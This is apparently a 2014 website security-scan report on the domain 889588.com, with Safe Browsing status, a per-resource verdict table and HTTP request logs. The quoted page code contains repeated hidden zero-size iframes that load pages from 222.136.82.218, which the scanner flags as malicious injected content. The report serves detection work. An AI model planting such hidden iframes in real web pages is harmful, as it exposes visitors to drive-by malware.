Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=889588.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://889588.com/ | 200 OK Content-Length: 91232 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 222.136.82.218 <meta http-equiv=content-type content="text/html; charset=gb2312">
<meta content="microsoft frontpage 6.0" name=generator> <meta content=frontpage.editor.document name=progid><link href="file:///h:/22.files/gamencss.css" type=text/css rel=stylesheet> <bgsound src="/music/1.mp3" loop="1"> <meta http-equiv=content-type content="text/html; charset=gb2312"> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0></iframe> <!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xh ...[3998 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://222.136.82.218:10/3/index.htm This URL is marked by Google as suspicious <iframe src=http://222.136.82.218:10/3/index.htm width=0 height=0> | ||
http://count37.51yes.com/click.aspx?id=377428612&logo=5 | 200 OK Content-Length: 1777 Content-Type: text/html | clean |
http://count37.51yes.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21269 Content-Type: text/javascript | clean |
http://cpro.baidu.com/cpro/ui/c.js | 200 OK Content-Length: 82294 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 0x0 src: http://cpro.baidustatic.com/cpro/ui/html/appdetect.html <iframe src="http://cpro.baidustatic.com/cpro/ui/html/appdetect.html" width="0" height="0"align="center,center" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="true" style="margin-left:{iframmarginleft}px" > | ||
http://news.baidu.com/ns?word=%b0%b2%cf%aa%b2%e8%d2%b6&tn=newsfcu&from=news&cl=2&rn=10&ct=0 | 200 OK Content-Length: 2537 Content-Type: text/html | clean |
http://news.baidu.com/ | 200 OK Content-Length: 114488 Content-Type: text/html | clean |
http://news.baidu.com/resource/js/jquery-1.8.3.min.js | 200 OK Content-Length: 74880 Content-Type: application/x-javascript | clean |
http://news.baidu.com/view.html | HTTP/1.1 302 Found Connection: Keep-Alive Date: Fri, 08 Aug 2014 15:22:56 GMT Location: http://news.baidu.com/ Server: Apache Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://news.baidu.com/z/ynlddz/new/zhuanti.html | 200 OK Content-Length: 34471 Content-Type: text/html | clean |
http://news.baidu.com/resource/js/contentplayer.js | 200 OK Content-Length: 4627 Content-Type: application/x-javascript | clean |
http://news.baidu.com/z/resource/js/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://news.baidu.com/z/ynlddz/new/ | HTTP/1.1 302 Found Cache-Control: max-age=180 Connection: Keep-Alive Date: Fri, 08 Aug 2014 15:23:07 GMT Location: http://news.baidu.com/newserror.html Server: Apache Vary: Accept-Encoding Content-Length: 220 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 08 Aug 2014 15:26:07 GMT | clean |
http://news.baidu.com/newserror.html | 200 OK Content-Length: 1974 Content-Type: text/html | clean |
http://news.baidu.com/newscode.html | 200 OK Content-Length: 22558 Content-Type: text/html | clean |
http://news.baidu.com/n?bypass=lamp&m=pagesother&v=newsgx | 200 OK Content-Length: 25242 Content-Type: text/html | clean |
http://news.baidu.com/history.html | 200 OK Content-Length: 4419 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 889588.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 08 Aug 2014 15:22:27 GMT
Server: Microsoft-IIS/6.0
Content-Length: 91232
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQCCSDA=EIEJJFHCOPJHDHHMIJNNHHID; path=/
X-Powered-By: ASP.NET
...91232 bytes of data.
GET / HTTP/1.1
Host: 889588.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 08 Aug 2014 15:22:27 GMT
Server: Microsoft-IIS/6.0
Content-Length: 91232
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQCCSDA=EIEJJFHCOPJHDHHMIJNNHHID; path=/
X-Powered-By: ASP.NET
...91232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 889588.com
Referer: http://www.google.com/search?q=889588.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 889588.com
Referer: http://www.google.com/search?q=889588.com
Result:
The result is similar to the first query. There are no suspicious redirects found.